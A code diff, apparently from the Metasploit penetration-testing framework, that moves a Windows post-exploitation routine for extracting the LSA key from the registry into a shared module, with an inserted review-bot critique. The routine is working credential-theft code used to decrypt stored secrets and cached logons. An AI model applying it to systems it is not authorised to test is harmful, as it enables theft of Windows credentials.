diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 37e822dcfe..6b773fbcc3 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -151,4 +151,48 @@ module Msf::Post::Windows::Priv
 return key.pack("C*")
 end
+ #
+ # Returns the LSA key upon input of the unscrambled bootkey
+ #
+ def capture_lsa_key(bootkey)
+ begin
+ vprint_status("Getting PolSecretEncryptionKey...")
+ ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
+ pol = ok.query_value("").data
+ vprint_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
+ ok.close
+ print_status("XP or below client")
+ @vista = 0
+ rescue
+ vprint_status("Trying 'V72' style...")
+ vprint_status("Getting PolEKList...")
+ ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
+ pol = ok.query_value("").data
+ vprint_good("Pol: #{pol.unpack("H*")[0]}")
+ ok.close
+ print_status("Vista or above client")
+ @vista = 1
+ end
+
+ if( @vista == 1 )
+ lsakey = decrypt_lsa(pol, bootkey)
+ lsakey = lsakey[68,32]
+ vprint_good(lsakey.unpack("H*")[0])
+ else
+ md5x = Digest::MD5.new()
+ md5x << bootkey
+ (1..1000).each do
+ md5x << pol[60,16]
+ end
+
+ rc4 = OpenSSL::Cipher::Cipher.new("rc4")
+ rc4.key = md5x.digest
+ lsakey = rc4.update(pol[12,48])
+ lsakey << rc4.final
+ lsakey = lsakey[0x10..0x1F]
+ end
+ return lsakey
+ end
+
 end
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index 5fcccd8aae..616030f2c4 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
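Review bot: `pol[60,16]`, `pol[12,48]` and `lsakey[68,32]` in the new capture_lsa_key assume the registry value (and the decrypt_lsa result) is long enough; on a short or unexpected value the slice yields nil, so the failure surfaces as `TypeError` from `md5x << nil` or `NoMethodError` from `nil.unpack` rather than as a message about the data. A length check between the begin/rescue block and the `if( @vista == 1 )` branch, e.g. `raise ArgumentError, "LSA policy value too short: #{pol.length} bytes" if pol.length < 76` (76 = 60 + 16 for the non-Vista path; the Vista path needs at least 100 bytes back from decrypt_lsa before `[68,32]` is meaningful), would fail with a clear cause instead. The bare `rescue` also routes any failure of the first branch — for example a denied read of the SECURITY hive or an error from `query_value` — into the PolEKList path, so the "XP or below"/"Vista or above" classification is inferred from any exception rather than from the key's absence; rescuing only the request-error class the registry API raises, or re-raising with context when the second read also fails, would keep a permissions problem distinguishable from an OS-version difference. `OpenSSL::Cipher::Cipher` is a deprecated alias of `OpenSSL::Cipher` with identical behaviour, and newer OpenSSL builds may not ship RC4 in the default provider, in which case `new("rc4")` raises — worth a one-line comment if this mixin is expected to run on current Rubies. The enclosing module starts outside the hunk.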
@@ -53,44 +53,6 @@ class Metasploit3 < Msf::Post
 end
 end
- def capture_lsa_key(bootkey)
- begin
- print_status("Getting PolSecretEncryptionKey...") if( datastore['DEBUG'] )
- ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
- pol = ok.query_value("").data
- print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}") if( datastore['DEBUG'] )
- ok.close
- print_status("XP compatible client")
- @vista = 0
- rescue
- print_status("Trying 'Vista' style...")
- print_status("Getting PolEKList...") if( datastore['DEBUG'] )
- ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
- pol = ok.query_value("").data
- ok.close
- print_status("Vista compatible client")
- @vista = 1
- end
-
- if( @vista == 1 )
- lsakey = decrypt_lsa(pol, bootkey)
- lsakey = lsakey[68,32]
- else
- md5x = Digest::MD5.new()
- md5x << bootkey
- (1..1000).each do
- md5x << pol[60,16]
- end
-
- rc4 = OpenSSL::Cipher::Cipher.new("rc4")
- rc4.key = md5x.digest
- lsakey = rc4.update(pol[12,48])
- lsakey << rc4.final
- lsakey = lsakey[0x10..0x1F]
- end
- return lsakey
- end
-
 def decrypt_secret(secret, key)
 # Ruby implementation of SystemFunction005
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 8d472d479b..772eab3e7d 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -30,46 +30,6 @@ class Metasploit3 < Msf::Post
 ))
 end
- def capture_lsa_key(bootkey)
- begin
- #print_status("Getting PolSecretEncryptionKey...")
- ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
- pol = ok.query_value("").data
- #print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
- ok.close
- print_status("XP compatible client")
- @vista = 0
- rescue
- #print_status("Trying 'V72' style...")
- #print_status("Getting PolEKList...")
- ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
- pol = ok.query_value("").data
- #print_good("Pol: #{pol.unpack("H*")[0]}")
- ok.close
- print_status("V/7/2k8 compatible client")
- @vista = 1
- end
-
- if( @vista == 1 )
- lsakey = decrypt_lsa(pol, bootkey)
- lsakey = lsakey[68,32]
- #print_good(lsakey.unpack("H*")[0])
- else
- md5x = Digest::MD5.new()
- md5x << bootkey
- (1..1000).each do
- md5x << pol[60,16]
- end
-
- rc4 = OpenSSL::Cipher::Cipher.new("rc4")
- rc4.key = md5x.digest
- lsakey = rc4.update(pol[12,48])
- lsakey << rc4.final
- lsakey = lsakey[0x10..0x1F]
- end
- return lsakey
- end
-
 def decrypt_secret(secret, key)
 # Ruby implementation of SystemFunction005